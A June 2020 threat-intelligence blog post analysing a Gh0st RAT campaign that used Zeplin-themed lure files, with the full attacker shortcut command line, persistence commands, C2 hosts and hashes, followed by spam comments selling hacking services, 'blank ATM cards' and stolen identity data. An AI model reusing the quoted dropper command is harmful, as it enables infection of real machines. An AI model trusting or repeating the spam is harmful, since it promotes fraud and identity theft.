Friday, June 5, 2020

The Gh0st Remains the Same

Author: Danny Adamitis 

Executive Summary 

Prevailion’s Tailored Intelligence Team has detected a new advanced campaign dubbed - “The Gh0st Remains the Same.”  This first campaign likely commenced between May 11th and 12th, 2020. In this engagement, the victims received a compressed RAR folder that contained trojanized files. If the malicious files were engaged, they displayed decoy web pages associated with the software company “Zeplin”. Zeplin is a software company that developed a platform to create a “connected space for product teams,'' and boasts over three million customers. Some of Zeplin’s more prominent users include: Starbucks, Airbnb, Slack, Dropbox, Pinterest, Shopify, Feedly and MailChimp. It is likely they chose to simulate collaboration-based software with a sizable user base, as a result of the increase in working from home (WFH) during the global pandemic.

This is a user-initiated infection, in this case the lure was a folder called “Project link and New copyright policy.rar”. Once decompressed, this folder contains two Microsoft shortcut files and a PDF, all of which reference the Zeplin platform. If the shortcut file was initiated it would begin a multistep infection chain that ultimately deployed a Ghost rat agent. This agent persisted on an infected machine by employing a scheduled task, while masquerading as a legitimate binary in the Windows startup folder. During the infection process, the subject machine communicated with three different remote command and control (C2) nodes. There were also indications that the agents could communicate over DNS as well as HTTP protocols.

We assess that the threat actor group is both technically proficient and experienced, based upon the Tactics, Techniques and Procedures (TTPs) displayed in this campaign - such as splitting up the attack into a myriad of steps and XORing parts of the payload to suppress the antivirus software detection rate. The threat actors exercised good tradecraft by keeping their malicious domains online for just a few days after the campaign started. The sample in question was uploaded to VirusTotal on May 12th, likely indicating when it was observed in the wild, and on the same day that the Zeplin Platform launched their new program “Zeplin Agency Members.” Furthermore, we observed a subsequent campaign employing the same infection process, that commenced on 30 May 2020. This particular campaign differed in its use of a trojanized Curriculum Vitae (CV) impersonating a college student named “Wang Lei” from Hong Kong, and the use of a hard-coded IP address in lieu of a threat actor controlled domain.

Through analyzing the timestamps, we noticed that they align with the +8 time zone. Additionally, we noticed a number of correlations between this campaign and a “Coronavirus (COVID-19) Situational Report” campaign that occurred earlier this year that was associated with Higaisa. Those correlations were significant enough that we assess with moderate confidence that Higaisa is also behind this campaign. Prior reporting suggests that the Higaisa group is likely government sponsored.

Technical Details

Introduction

Prevailion’s tailored intelligence team discovered a campaign that highlights an elegant use of commercially available tools by an advanced adversary. We suspect this actor intentionally chose commercially available frameworks to provide a level of anonymity and plausible deniability. If the malicious files were engaged, they displayed decoy web pages associated with the software company Zeplin. Zeplin is a software company that developed a platform to create a “connected space for product teams” and boasts over three million customers. It is likely they chose to simulate collaboration-based software with a sizable user base, as a result of the increase in working from home (WFH) during the global pandemic. By analyzing google trends, we noted that the Zeplin app was of interest in the United States, United Kingdom, and India, which possibly hint at the targeted entities.

Google Trends for Zeplin App

The threat actors appeared to create the decoy file seven days prior to the malicious files being observed in the wild. They also took down their infrastructure a short time after the attack began - highlighting an acute level of situational awareness. We assess that the campaign likely commenced between May 11th, 01:03:02 and May 12th 17:59:57. The rar file was first uploaded to VirusTotal on May12th at 17:59:57, which likely denotes when the sample was first observed. It’s unclear if it was intentional, or simply fortuitous, that the campaign occurred the same day that the Zeplin Platform launched their new “Zeplin Agency Members”. Such an announcement could conceivably result in copyright provisions change, which would be unlikely to draw scrutiny from their established user base.

Campaign Timeline

      May 5th the PDF file “Zeplin Copyright Policy” was created 2020:05:06 08:37:39
      May 6th the contents of PDF file “Zeplin Copyright Policy” were last modified 00:37:41
      May 8th files svchast.exe and 3t54dEr.tmp were created at the same time 23:17:58
      May 9th the domain comcleanner dot info starts to resolve to the dedicated VPS
      May 11th the lnk microsoft link file was created by the threat actors 01:03:02
      May 11th-12th, the victims received the trojanized RAR file
      May 12th Zeplin announcement “Introducing Zeplin Agency Members” at 12:03
      May 12th The file “Project link and New copyright policy.rar” was first submitted to VT 17:59:57
      May 16th the domain comcleanner dot info stopped resolving

Campaign Timeline Graphic (click to expand)

Infection Vector

Infection chain used in the May 2020 Campaign

The infection chain began when the victims received an rar file named “Project link and New copyright policy.rar”. Once the file was decompressed, the folder contained two microsoft shortcut (lnk) files and a PDF file. The three files were named:
      Zeplin Copyright Policy.pdf
      Conversations - iOS - Swipe Icons - Zeplin.lnk
      Tokbox icon - Odds and Ends - iOS - Zeplin.lnk

The PDF file “Zeplin Copyright Policy,” which was benign, was taken from the Zeplin public website. The actor used the tool wkhtmktopdf  to convert the website to a PDF on May 5th at 09:37:39 UTC. They then modified the file the following day, May 6th 00:37:41; the only difference between the website and PDF was the last updated line. In the actor-modified version, the last updated line was dated “1 May 2020”, while the Zeplin website listed the last updated line as “18 October 2019”. We assess that its purpose was to act as a decoy, in case the PDF was examined further by security products.

Image of the modified PDF file that was displayed to victims

The victim is then enticed to click on one of the Microsoft shortcut files that executes a series of commands which begins the attack. The Microsoft shortcut file’s properties and purpose will be explored in the following section. The lnk file contained a “decoy” component, and would open a web browser to display a webpage hosted on the zeplin.io domain, https://app.zeplin.io/project/5b5741802f3131c3a63057a4/screen/5b589f697e44cee37e0e61df. When visited this webpage was only accessible to a certain organization.

A copy of the aforementioned decoy Zeplin web page when visited by an outside account

Microsoft Link Lures

The Prevailion team first analyzed the metadata properties of the lnk files to look for any artifacts that might have been left by the file creator. We found that almost all such metadata had been intentionally stripped out by the adversary. Typically LNK files contain useful information about the originators computer such as Machine ID, Drive serial numbers, Mac Address, Volume, and file systems. However the only thing left in these two samples was the creation date of the file May 11th, 2020, timestamp 08:03:01.0 [UTC] and the date the C drive was created 03/18/2019 (21:37:44.0) [UTC].

When the file is executed, it pulls a block of data from the lnk file and saves it as cSi1rouy.tmp. It will then base64 decode that data, which reveals a Microsoft Cabinet file (.cab). Microsoft Cabinet files are “an archive-file format for Microsoft Windows that supports lossless data compression and embedded digital certificates used for maintaining archive integrity.” Once the cabinet file is decompressed it reveals four more files:
      34fDFkfSD32.js
      Svchast.exe (Note this was the threat actor’s spelling of the file)
      3t54dE3r.tmp
      Conversations - iOS - Swipe Icons - Zeplin.url

A copy of the full command line argument has been copied below.
C:\Windows\System32\cmd.exe /c  copy "Conversations - iOS - Swipe Icons - Zeplin.lnk" %temp%\g4ZokyumB2DC.tmp /y& for /r C:\Windows\System32\ %i in (*ertu*.exe) do copy %i %temp%\gosia.exe /y& findstr.exe /b "TVNDRgA" %temp%\g4ZokyumB2DC.tmp>%temp%\cSi1rouy.tmp&%temp%\gosia.exe -decode %temp%\cSi1rouy.tmp %temp%\o423DFDS.tmp&expand %temp%\o423DFDS.tmp -F:* %temp%&"%temp%\Conversations - iOS - Swipe Icons - Zeplin.url"&copy %temp%\3t54dE3r.tmp C:\Users\Public\Downloads\3t54dE3r.tmp&Wscript %tmp%\34fDFkfSD32.js&exit
Icon location (UNICODE):              
 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Javascript File 

The last function of the command line is to initiate the javascript file “34fDFkfSD32.js.” The javascript file spawns a hidden command shell, runs ipconfig and redirects the output to a file called “d3reEW.txt”. The file is then sent to a presumed threat actor hostname hxxp://zeplin[.]atwebpages[.]com/inter.php after sleeping for 1000 seconds.

Next, the javascript file copies svchast.exe to the Windows Startup folder, that file path was:
%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\officeupdate.exe

Copying the malicious file to this path is significant for two reasons. First, it allows for persistence on the infected machine, as the programs inside this folder are automatically initiated upon start up. Second, it was intended to blend into the target environment by masquerading as the legitimately signed Microsoft program officeupdate.exe, sha1:7fc78cce74b31414278444eff8c99156d98c2bcd. In order to have some redundancy, the threat actor copies the loader file, svchast.exe, to the downloads folder and renames it officeupdate.exe. They created a scheduled task with the name “Driver Booster Update” to run every two hours and execute the officeupdate.exe file located in the downloads folder. Finally, it launches the svchast.exe file through a command shell. 

Loader And ShellCode

For the sake of clarity, I will continue to call this particular file svchast.exe, in order to prevent confusion with the legitimate binary officeupdate.exe. Svchast was designed as a Win64 portable executable (pe) file, that had a time stamp listed as 2018:08:28 01:57:55-07:00. Upon further analysis, the last modification date was listed 2020:05:08 23:17:58-07:00, three days prior to the lnk file being created. This file loads the main payload,3t54de.tmp, from the Downloads folder where it was placed by the aforementioned javascript. Svchast.exe would check the file type and size. The loader will determine if it is being run in a debugger, as an anti-analysis check. If it is, the file will cease execution. If the file is not being run in a debugger, it will then XOR decode a section of the 3t54dE3r.tmp file with the key 0xCF. Once complete, it injects into the running process.

Function loading the 3t54de.tmp file on the left, Anti-debugging function on the right

The last file to discuss is 3t54de.tmp, which was located in the previously mentioned Microsoft Cabinet file. This appeared to be a shellcode that contained the threat actor C2 node. It performs some host based enumeration upon the infected machine, then establishes a persistent connection between the infected host and the C2. 

This appeared to be an evolution of the previous loader (sha1:640682ef5b228d940634d161b7038ad002288aca) that was used by the Higaisa in 2019, where it was all one compiled executable. By using the process injection method, the threat actor lowered its detection rate. As of May 22, only 3 antivirus engines out of 73 detected the svchast file as being malicious, and 3t54de.tmp had a detection rate of zero.

During our analysis of the aforementioned sample, we identified an embedded URL hxxps://comcleanner[dot]info/msdn.cpp. Unfortunately the threat actor stopped resolving the domain approximately four days after the campaign started, therefore we were unable to enumerate any subsequent payloads. We did attempt to create a honey-pot machine however we were not served the malicious payload, for either this campaign or the “Collin CV Campaign.” We ran the CV sample on Friday May 29th, the day the sample was first uploaded to Virustoal. We were not able to locate a file by that name in our malware repositories. In previous reporting, the threat actors were noted deploying an in-memory version of the Gh0st rat payload. It should be noted that the source code for this agent has been available online since 2008.

One interesting note was that files ending in the extension .cpp, typically indicates a file containing code written C++. However we did find one reference to the file “msdn.cpp.” It appeared in a tweet by @bad_packets, where they observed mass scanning for that URL by an undisclosed security researcher that operates the domain Tequillaboomboom dot club.

Command and Control Communications

Another compelling detail we observed was the threat actor configured redundant communications channels during this particular campaign. The first command and control node employed was the hostname hxxp://zeplin[.]atwebpages[.]com/inter.php - which would receive the output of the ipconfig command. While this might seem trivial, this could be used as a filtering mechanism by the threat actor to determine if they compromised their intended target’s workstation. This method can confirm that they are not interacting with a honeypot machine. They could also determine if something had run afoul, if they see connections to the subsequent C2 from an IP address not in the first one. In order to disguise their malicious hostname to appear more legitimate, the threat actors cloned a templated resume web page from bootstraptemple.com.

Resume web page from BootstrapTemple to the left, actor controlled website to the right

The payload interacts with two supplementary C2 nodes. First contact is with the authoritative name server, in order to obtain the IP address for the embedded domain comcleanner[dot]info. In this particular case, the authoritative name server was ns1[dot]comcleanner[dot]info. Querying this name server would return the IP address 66.42.96[.]115 for the domain comcleanner[dot]info. When we ran a query on the IP address 66.42.96[.]115 in Zetalytics, we noticed that the domain comcleanner[dot]info stopped resolving to it on May 15th, 2020. We thought it was of interest that the domain only resolved for a small 6 day window in total, and was likely taken down a few days after the initial campaign began. We feel this shows that the threat actor behind this campaign exhibited a high degree of operational security, and that the threat actor may have changed C2 nodes once they infected the target.

One other notable fact was that the name server ns1[dot]comcleanner[dot]info was also hosted on a dedicated VPS, at IP address 45.76.31[.]159. If they did once again use the Gh0st rat payload, as in previous campaigns, they would have the ability to perform DNS tunneling. We assess this was likely configured as an alternate communications channel, if they had trouble communicating with the infected device through the standard HTTP protocol.

Correlations to Known Threat Activity  

While this operation did not employ a new trojan, they utilized multiple files in different formats to break the attack up into a myriad of steps, rather than just using one stand alone executable. This technique allowed them to keep the detection rate low and their trojan remained undetected. They also made efforts to complicate some aspects of analysis; such as removing metadata from the lnk files, timestomping the executable, and adding debugger checks. These tactics lead us to assess that this campaign was performed by a sophisticated threat actor.

By analyzing individual elements of this campaign, we noted a number of correlations to prior threat actor reporting. Some of the more interesting data points came from the timestamps left behind by the originator. We found the decoy PDF file to be particularly revealing, the metadata extracted through ExifTools is listed below.

ExifTool Version Number         : 11.87
File Name                                : Zeplin Copyright Policy.pdf
Directory                                  : .
File Size                                  : 27 kB
File Modification Date/Time     : 2020:05:06 00:37:41-07:00
File Permissions                      : rw-r--r--
File Type                                  : PDF
File Type Extension                 : pdf
MIME Type                              : application/pdf
PDF Version                            : 1.4
Linearized                                : No
Title                                          : Zeplin Copyright Policy | Zeplin
Creator                                    : wkhtmltopdf 0.12.5
Producer                                  : Qt 4.8.7
Create Date                             : 2020:05:06 09:37:39+02:00
Page Count                              : 1
Page Mode                              : UseOutlines

Two particular data points from this PDF were the “Create Date” and the “FIle Modification date/time.” The create date shows that this file was created on May 6th at 09:37:39 UTC, and was last modified the following day at 00:37:41 UTC. We noticed that these times align with the +8 timezone, which is used in the Korean peninsula among other countries. Porting these times from UTC to the +8 timezone, the file would have been created at approximately 5:37 PM. After the file was created, the actor likely went home for the night and then subsequently modified it the following morning when they arrived at work at 8:37 am local time.

We observed similar TTPs displayed earlier this year in a separate Coronavirus (COVID-19) themed campaign that was reported here. We noted parallels in the Microsoft shortcut command syntax, embedding a Microsoft Cabinet file within a lnk file, and the use of Javascript.

Based upon the totality of available information, we assess with high confidence that this campaign was performed by the same actors responsible for the Coronavirus, Covid-19, themed campaign in March. Based upon the timestamp analysis and the overlapping infrastructure between the Anomali and Tencent report, we assess with moderate confidence that this cluster was associated with Higaisa. Previous reporting suggests that the Higaisa group has been active since 2016. Our assessment would be bolstered by uncovering subsequent agents deployed in this operation as well as associating subsequent campaigns to this cluster of activity.

Conclusion 

While none of the tools used in this particular campaign were completely new or innovative, we believe that the threat actor made the most of every tool they used and was likely able to avoid detection. They also created the Zeplin lure, in order to pry upon the current situation and take advantage of the collaborative software in a WFH environment. However, through careful examination of these artifacts, analysts can find little clues to help them gain a better understanding of the campaign. In order to curtail these nefarious efforts, we recommend that all users exercise great caution when receiving emails from an unknown source. We also advise against executing any Microsoft shortcut links, especially from untrusted sources. We recommend enabling and updating antivirus services, since this threat actor relied upon commercially available toolkits. Where viable, increase monitoring network logs for remote connections to VPS providers.

Indicators of Compromise

First Campaign
Project link and New copyright policy.rar
sha256:C3a45aaf6ba9f2a53d26a96406b6c34a56f364abe1dd54d55461b9cc5b9d9a04
Zeplin Copyright Policy.pdf - (benign file)
sha256:75cd8d24030a3160b1f49f1b46257f9d6639433214a10564d432b74cc8c4d020  
Conversations - iOS - Swipe Icons - Zeplin.lnk
sha256:C0a0266f6df7f1235aeb4aad554e505320560967248c9c5cce7409fc77b56bd5
Tokbox icon - Odds and Ends - iOS - Zeplin.lnk
sha256:1074654a3f3df73f6e0fd0ad81597c662b75c273c92dc75c5a6bea81f093ef81 
cSi1rouy.tmp - Microsoft Cab file
sha256:A541eed95ecffca5b6dbfa0e0f49376beaa497823d9fbd165baa6e4c107e53d4
Conversations - iOS - Swipe Icons - Zeplin.url (benign file)
sha256:bcfff6c0d72a8041a37fe3cc5c0233ac4ef8c3b7c3c6bca70d2fcfaed4c5325e 
34fDFkfSD32.js
sha256:0deb252a5048c3371358618750813e947458c77e651c729b9d51363f3d16b583 
Svchast.exe a.k.a. Malicious officeupdate.exe
sha256:35a1ff5b9ad3f46222861818e3bb8a2323e20605d15d4fe395e1d16f48189530 
3t54dE3r.tmp
sha256:8e6945ae06dd849b9db0c2983bca82de1dddbf79afb371aa88da71c19c44c996

Command and Control
hxxp://zeplin[.]atwebpages[.]com/inter.php
hxxps://www[.]comcleanner[.]info/msdn.cpp
            IP address: 66.42.96[.]115
ns1[.]comcleanner[.]info
            IP address: 45.76.31[.]159

Second campaign
CV_Colliers.rar
sha256:df999d24bde96decdbb65287ca0986db98f73b4ed477e18c3ef100064bceba6d
International English Language Testing System certificate.pdf.lnk
sha256:C613487a5fc65b3b4ca855980e33dd327b3f37a61ce0809518ba98b454ebf68b
Curriculum Vitae_WANG LEI_Hong Kong Polytechnic University.pdf.lnk
sha256:50d081e526beeb61dc6180f809d6230e7cc56d9a2562dd0f7e01f7c6e73388d9
sha256:dcd2531aa89a99f009a740eab43d2aa2b8c1ed7c8d7e755405039f3a235e23a6
Cabinet File
sha256:518000675a95158113acd23d86249c8f60ad9863624b15b072dc2e7eef4e70ce
34fDFkfSD38.js
sha256:dca8fcb7879cf4718de0ee61a88425fca9dfa9883be187bae3534076f835a54d
svchast.exe
sha256:a251069b3fccd528cf2ce8ed36d814e974068fb4a1d9a5e67a4eb8fffa09e938
66DF3DFG.tmp
sha256:4733d1204b06dc95178e83834af61934a423534e1d4edd402b37e226f0f2727f

Command and Control
hxxp://goodhk[.]azurewebsites[.]net/inter.php
hxxps://45.76.6[.]149/msdn.cpp

Third Campaign
Unidentified Campaign Likely occurring January 2020
7zip file
sha256:2990c8832626ab5e7b39ddfd39f2901fc7f511acee79cda040d3d56b646b61d9
svchosl.exe
sha256:022be9c0bff25bb86b2e2d0907e1e45c76d1375c80f5d38b0588f5a41683ecdf
svchosl.bin
sha256:Afee9da28c06c5f0a2b8cfdaf5b59ebdb2e5a8c0899fee529babbbdee25ccc7c

Command and Control
hxxps://mlcrosoft[.]site/msdn.cpp
ns1[.]mlcrosoft[.]site
            IP address:149.28.78[.]89

Host Based Indicators
schtasks /create /SC minute /MO 120 /TN "Driver Bootser Update"
schtasks /create /SC minute /MO 120 /TN "Office update task"
C:\\Users\\Public\\Downloads\\officeupdate.exe
C:\\Users\\Public\\Downloads\\d3reEW.txt
C:\\Users\\Public\\Downloads\\3t54dE.tmp
C:\\Users\\Public\\Downloads\\66DF3DFG.tmp
C:\\Users\\Public\\Downloads\\svchosl.bin
%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\officeupdate.exe

MITRE ATT&CK Framework Mapping
Tactic
Technique
Initial Access
SpearPhishing Attachment (T1193)
Execution
User Execution (T1204)
Persistent
Scheduled Task (T1053), Startup item (T1165)
Defensive Evasion
Masquerading (T1036), Process Injection (T1055), TimeStomp (T1009)
Collection
Data from Local System (T1005)
Command & Control
Commonly used port (T1043), Web service (T1102),
Remote File copy (T1105), Fallback Channels (T1008)
Exfiltration
Exfiltration Over Command and Control Channel (T1041), Exfiltration over Alternative Protocol (T1048)

24 comments:

  1. Replies
    1. Need The To Hire A Hacker❓ Then contact PYTHONAX✅

      The really amazing deal about contacting PYTHONAX is that the Hack done by us can’t get traced to you, as every Hacking job we do is strongly protected by our Firewall. It’s like saying if anyone tries to trace the Hack, it will lead them to us and we block whatever actions they are doing.

      We have been Invisible to Authorities for almost a decade now and if you google PYTHONAX, not really about us comes out, you can only see comments made by us or about us.

      Another Amazing thing to you benefit from Hiring our Hackers is that you get a Legit and the best Hacking service, As we provide you with Professional Hackers who have their Hacking Areas of specialization.
      We perform every Hack there is, using special Hacking tools we get from the dark web.

      Some list of Hacking Services we provide are-:
      ▪️Phone Hacking & Cloning ✅
      ▪️Computer Hacking ✅
      ▪️Emails & Social Media Account Hacking✅
      ▪️Recovering Deleted Files✅
      ▪️Tracking & Finding People ✅
      ▪️Hunting Down Scammers✅
      ▪️Hack detecting ✅
      ▪️Stealing/Copying Files & Documents From Restricted Networks and Servers ✅
      ▪️Credit Score Manipulation ✅
      ▪️ Deleting Criminal Records✅
      ▪️Bitcoin Multiplication✅
      ▪️Binary Option Money Recovery ✅
      ▪️Scam Money Recovery✅ And lots more......

      ✳️ SPECIAL HACKING SERVICES-: we also specialize in Scam Bounty, as we chase down SCAMMERS and help individuals RECOVER Money stolen from them by this online SCAMMERS. Please be watchful about this SCAMMERS. They post ❌ENTICING TESTIMONIES and it quite Convincing.


      Whatever Hacking service you require, just give us an Email to the Emails Address provided below.
      [email protected]
      [email protected]

      PYTHONAX.
      2020 © All Right Reserved.

      Delete
  2. Hello everyone , here’s your opportunity for you to achieve your dreams of being a multi million dollar rich through trading , I once loss all I got through trading but was fortunate to come across a woman with great virtue and selfless heart (Mary ) i was introduce to her masterclass strategy while searching online which has revived me of all my losses and made me gain more and more . With her unique strategy you are entitled to daily signals and instant withdraw ,be rest assured of getting a refund of all your loss investment with any platform that has denied you in one way or the other in getting your money . Mr Payton masterclass strategy is simply the best for beginners and those that are finding it difficult to succeed through trading he’ll help you with just a simple step . Email her ([email protected]) .Remember this is absolutely free!!!

    ReplyDelete
  3. This year 2020 has been so blissful to me for God has given me a reason to live happily again after been heart broken for 3 months when my husband neglected me and went back to he's mistress. I suffered and went through all types of emotional tortures for i couldn't get any help to get my man back not until i was refereed to Dr. Iyaya by my co-worker who gave me her full assurance about him that he can be of help to me. I got in touch with Dr. Iyaya and i hearken to his words and followed the instructions given to me by him. Could you believe that my husband got back home within 48hours as said by him and today, my marriage is restored & i'm so thankful, appreciative & grateful to God for using Dr. Iyaya to get my man back after 3 months of broken marriage. Is there anyone out there who needs to get back to he's or her lover back or needs any help of any kind? Then, i suggest that you get in touch with Dr. Iyaya now through hiS Email: [email protected] Call WhatsApp:+2347032756397 for more information, visit his website you may found your solution there www.https://dr-iyaya-herbal-remedy.webnode.com God bless you sir.

    ReplyDelete
  4. BE SMART AND BECOME RICH IN LESS THAN 3DAYS....It all depends on how fast 
    you can be to get the new PROGRAMMED blank ATM card that is capable of
    hacking into any ATM machine,anywhere in the world. I got to know about 
    this BLANK ATM CARD when I was searching for job online about a month 
    ago..It has really changed my life for good and now I can say I'm rich and 
    I can never be poor again. The least money I get in a day with it is about 
    $50,000.(fifty thousand USD) Every now and then I keeping pumping money 
    into my account. Though is illegal,there is no risk of being caught 
    ,because it has been programmed in such a way that it is not traceable,it 
    also has a technique that makes it impossible for the CCTVs to detect 
    you..For details on how to get yours today, email the hackers on : (
    [email protected] ). Tell your 
    loved once too, and start to live large. That's the simple testimony of how 
    my life changed for good...Love you all ...the email address again is ;
    [email protected]

    ReplyDelete
  5. Hello everyone, Are you looking for a professional trader, forex and binary manager who will help you trade and manager your account with good and massive amount of profit in return. you can contact MR. CARLOS ELLISON for your investment plan, for he helped me earned 12,000usd with little investment funds. Carlos Ellison you're the best trader I can recommend for anyone who wants to invest and trade with a genuine trader, he also helps in recovery of loss funds..you can contact him on his Email:
    [email protected]
    Via whatsapp: (+12166263236)
    Via Telegram : +12166263236

    I advice you shouldn't hesitate. He's great.

    ReplyDelete
  6. GET RICH WITH BLANK ATM CARD ... Whatsapp: +18033921735

    I want to testify about Dark Web blank atm cards which can withdraw money from any atm machines around the world. I was very poor before and have no job. I saw so many testimony about how Dark Web hackers send them the atm blank card and use it to collect money in any atm machine and become rich. ( [email protected] ) I email them also and they sent me the blank atm card. I have use it to get 90,000 dollars. withdraw the maximum of 5,000 USD daily. Dark Web is giving out the card just to help the poor. Hack and take money directly from any atm machine vault with the use of atm programmed card which runs in automatic mode.

    Email: [email protected]
    Text & Call or WhatsApp: +18033921735

    ReplyDelete
  7. Selling USA FRESH SPAMMED SSN Leads/Fullz, along with Driving License/ID Number with EXCELLENT connectivity.

    **PRICE**
    >>2$ FOR EACH LEAD/FULLZ/PROFILE
    >>5$ FOR EACH PREMIUM LEAD/FULLZ/PROFILE

    >All Leads are Tested & Verified.
    >Invalid info found, will be replaced.
    >Serious buyers will be welcome & will give discounts to them.
    >Fresh spammed data of USA Credit Bureau
    >Good credit Scores, 700 minimum scores.

    Email > [email protected]
    Telegram > @leadsupplier
    ICQ > 752822040

    **DETAILS IN EACH LEAD/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER WITH EXPIRY DATE
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL, I.P ADDRESS
    ->EMPLOYEE DETAILS
    ->REALTIONSHIP DETAILS
    ->MORTGAGE INFO
    ->BANK ACCOUNT DETAILS

    ->Bulk order will be preferable
    ->Minimum order 25 to 30 leads/fullz
    ->Hope for the long term business
    ->You can asked for specific states & zips
    ->You can demand for samples if you want to test
    ->Data will be given with in few mins after payment received
    ->Payment mode BTC, PAYPAL & PERFECT MONEY

    **Contact 24/7**

    Email > [email protected]
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  8. Hello Guys!!! I am belinda. I live in Ottawa,Canada. I am very excited today and do not know where to start my testimony from. I lost my job a month ago and things had been tough for me as a mother. I had 3 kids and found it difficult to pay my bills and feed my kids. My husband left me and the kids for another woman and ever since then we were living in pain and hunger but just few days ago I came across a testimony of a man who got a blank ATM card from Mr.Alexander so I immediately contacted him for the same type of ATM card and I am very happy to announce to the world that I am living a fulfilled life. This blank ATM card can withdraw up to 10,000 dollars and more daily without you having any account with any bank. Now I can proudly say I'm rich. I have been able to buy a house,start my business and I have enough money for my family. Contact Mr.Alexander today to get your card via his email address:[email protected]

    ReplyDelete
  9. Hello Guys!!! I am belinda. I live in Ottawa,Canada. I am very excited today and do not know where to start my testimony from. I lost my job a month ago and things had been tough for me as a mother. I had 3 kids and found it difficult to pay my bills and feed my kids. My husband left me and the kids for another woman and ever since then we were living in pain and hunger but just few days ago I came across a testimony of a man who got a blank ATM card from Mr.Alexander so I immediately contacted him for the same type of ATM card and I am very happy to announce to the world that I am living a fulfilled life. This blank ATM card can withdraw up to 10,000 dollars and more daily without you having any account with any bank. Now I can proudly say I'm rich. I have been able to buy a house,start my business and I have enough money for my family. Contact Mr.Alexander today to get your card via his email address:[email protected]

    ReplyDelete

  10. BE SMART AND BECOME RICH IN LESS THAN 3DAYS It all depends on how fast 
    you can be to get the new PROGRAMMED blank ATM card that is capable of
    hacking into any ATM machine, anywhere in the world. I got to know about 
    this BLANK ATM CARD when I was searching for job online about a month 
    ago It has really changed my life for good and now I can say I'm rich and 
    I can never be poor again. The least money I get in a day with it is about 
    $50,000.(fifty thousand USD) Every now and then I keeping pumping money 
    into my account. Though is illegal,there is no risk of being caught 
    ,because it has been programmed in such a way that it is not traceable,it 
    also has a technique that makes it impossible for the CCTVs to detect 
    you. For details on how to get yours today, email the hackers on :
    [email protected] Tell your 
    loved once too, and start to live large. That's the simple testimony of how 
    my life changed for good. Love you all . the email address again is
    [email protected]

    ReplyDelete
  11. I was married for 16 years to a loving mother and wife. We had 2 children together who are now 11 and 13. I reconnected with an old girlfriend from college on Facebook and we began an affair and I left my wife. The woman I had an affair with is a wonderful woman and I love her too and our kids had begun accepting the situation and my wife has kind of moved on, but not in love with the man she is seeing. I thought I fell out of love with my wife and I felt terrible about what I did to her - she is a good woman and I don't know what came over me. I decided to try and get her back and I was recommended to Lord Zakuza for help to get reunited with my wife and within 48 hours after I made contact with Lord Zakuza my wife decided to work things out with me and now we are back together with our children living as one happy family. I really don't know the words to use in appreciation of what Lord Zakuza did for me but I will say thank you sir for reuniting I and my family back. For those in trying times with their marriages or relationship can WhatsApp Lord Zakuza for help with this number +1 740 573 9483 or you can send him an email to [email protected]

    ReplyDelete

  12. BE SMART AND BECOME RICH IN LESS THAN 3DAYS It all depends on how fast 
    you can be to get the new PROGRAMMED blank ATM card that is capable of
    hacking into any ATM machine, anywhere in the world. I got to know about 
    this BLANK ATM CARD when I was searching for job online about a month 
    ago It has really changed my life for good and now I can say I'm rich and 
    I can never be poor again. The least money I get in a day with it is about 
    $50,000.(fifty thousand USD) Every now and then I keeping pumping money 
    into my account. Though is illegal,there is no risk of being caught 
    ,because it has been programmed in such a way that it is not traceable,it 
    also has a technique that makes it impossible for the CCTVs to detect 
    you. For details on how to get yours today, email the hackers on :
    [email protected] Tell your 
    loved once too, and start to live large. That's the simple testimony of how 
    my life changed for good. Love you all . the email address again is
    [email protected]

    ReplyDelete
  13. How I Got My Ex Husband Back. Am so excited, All Thanks goes to Dr Prince i was married to my husband, and we were living fine and happy. it come to an extend that my husband that use to love and care for me, doesn't have my time again, until i fined at that he was having an affair with another woman, I tried to stop him all my effort was in-vain suddenly he divorce me and went for the woman. he live me with two of our kids, I cried all day, I was in pains, sorrow and looking for help. I read a comment on how Dr Prince helped a lady to brought her husband back, after 2yrs , He helped people with his Magic spell love and reuniting spell. so I decided to contact him and explain my problems to him, he did a love spell that made my husband to come back to me and never think of the woman. this man is God sent to restore heart break and reunite relationship. may the lord be your strength and continue to use you to save people relationship and any problems contact him for help on [email protected] You can also contact him through his WhatsApp +19492293867. Contact him now for love spell to bring back your ex lover he is the best spell caster and he is the best solution to all relationship problems…

    ReplyDelete
  14. How I Got My Ex Husband Back. Am so excited, All Thanks goes to Dr Prince i was married to my husband, and we were living fine and happy. it come to an extend that my husband that use to love and care for me, doesn't have my time again, until i fined at that he was having an affair with another woman, I tried to stop him all my effort was in-vain suddenly he divorce me and went for the woman. he live me with two of our kids, I cried all day, I was in pains, sorrow and looking for help. I read a comment on how Dr Prince helped a lady to brought her husband back, after 2yrs , He helped people with his Magic spell love and reuniting spell. so I decided to contact him and explain my problems to him, he did a love spell that made my husband to come back to me and never think of the woman. this man is God sent to restore heart break and reunite relationship. may the lord be your strength and continue to use you to save people relationship and any problems contact him for help on [email protected] You can also contact him through his WhatsApp +19492293867. Contact him now for love spell to bring back your ex lover he is the best spell caster and he is the best solution to all relationship problems…

    ReplyDelete
  15. I can vouch for him because I have used him to monitor my husband many time when I feel suspicious about his movements TALENTED HACKERS DO YOU REQUIRE A CERTIFIED HACKER FOR : +University grades hack, +Bank account hacks, +Control devices remotely hack, +Facebook Hacking Tricks, +Gmail, AOL, Yahoomail, inbox, hack are available, +Database hacking, +PC computer tricks +Bank transfer, Western Union, money gram, Credit Card transfer +Wiping of credit, +VPN software, +ATM Hack we are the real deal when it comes to hacking, carding, WU transfer, Money Gram transfer etc contact us now on : [email protected] him for all kind of hacking job and you will be glad you did whatsapp+12132951376

    ReplyDelete

  16. Getting your lover or your ex back has been made more easy by this powerful spell caster called Dr Odion. I am Rose by name and i am from canada, the only reason why i am on this site is to thank this powerful spell caster called DR. Odion and you can improve your relationship success by contacting him through these details ([email protected] Or call +2348136482342) This powerful spell caster did me a huge favor by helping me get my lover back to me within the speed of light and since then my relationship has been perfect.

    any problem of yours.He is specialized in the following:

    (1)Spell for protection from danger
    (2)Spell for magic
    (3)Spell for same sex love
    (4)Spell for healing
    (5)Spell for invisibility
    (6)Spell for riches and fame
    (7)Spell to get a good job
    (8)Spell for strong love and relationship
    (9)Spell to bring your ex back
    (10)speII for Lottery
    This man has great powers and is incredibly generous.You can contact him on
    ([email protected])

    ReplyDelete
